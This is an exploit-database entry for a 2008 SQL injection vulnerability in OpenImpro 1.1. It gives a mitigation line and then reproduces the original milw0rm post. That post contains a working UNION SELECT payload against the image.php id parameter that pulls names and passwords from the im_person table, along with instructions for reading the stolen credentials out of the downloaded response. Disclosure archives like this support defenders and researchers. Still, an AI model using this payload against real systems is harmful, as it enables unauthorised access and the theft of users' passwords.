header-logo
Suggest Exploit
vendor:
OpenImpro
by:
nuclear
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: OpenImpro
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

OpenImpro 1.1(id) Sql Injection Vulnerability

When an attacker sends a malicious SQL query to the vulnerable web application, the application can be tricked into executing unintended commands or revealing sensitive data.

Mitigation:

Input validation, parameterized queries, and stored procedures can help prevent SQL injection attacks.
Source

Exploit-DB raw data:

#OpenImpro 1.1(id) Sql Injection Vulnerability



#Author: nuclear



#script: http://downloads.sourceforge.net/openimpro/openimpro-1.1.zip



#exploit: target.com/image.php?id=-1 union select 1,2,concat(firstname,0x3a,lastname,0x3a,password),4,5,6 from im_person --


#Description:
when you do the injection you will be asked to download a file called image.php . Save it,open with any
texteditor and get your password ;).


#greetz cAs, Mi4night, zYzTeM, THE_MAN, Pepe, I-O-W-A, Digitalfortress, DiGitalX, sys32-hack, sys32r, and me :P

# milw0rm.com [2008-08-10]